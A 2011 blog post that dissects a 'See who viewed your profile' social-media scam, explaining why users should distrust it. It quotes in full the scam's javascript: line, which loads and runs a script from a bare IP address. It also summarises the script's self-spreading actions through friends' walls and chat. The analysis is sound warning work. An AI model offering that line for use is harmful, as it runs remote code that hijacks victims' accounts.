Skip to content

SEe Wh0 viewed Y0ur Pr0f!le — a deconstruction

May 4, 2011

It asks us to run

javascript:(a=(b=document).createElement('script')).src='//83.170.78.127/7861.js',b.body.appendChild(a);void(0)

in the location bar.  This should ring alarm bells at once: the only reason to ask this is that the browser would block such functionality in clicking a link, and a browser would probably have good reason to block such things.

Anyway, it asks the browser to download and execute (by adding a script element to the page) the file http://83.170.78.12/7861.js.  More alarm bells: the url points to an anonymous (numbered) web location (reverse DNS gives it as raq445.uk2.net, pointing a browser there redirects to a page at http://www.rsvp.co.uk/).  Anything proper would not be doing this.

So, we download the file (using CURL, not a browser) and take a look in a text editor.

Amongst the comments (which are nicely left in) we see

// Post Link to friends walls
// Hide chat boxes
// Get online friends and send chat message to them

which gives a good hint as to what it does, and then it modifies the HTML on screen and then sends the browser to a new page: http://oryxseo.com/786.php.

There is much code commented out, which indicates that most likely someone downloaded this from one scam and modified it for use in this one–probably some bored 16 year old with no life wondering what mischief he can get up to with his computer.  Have pity on the poor sod.

Advertisements

From → Uncategorized

Leave a Comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: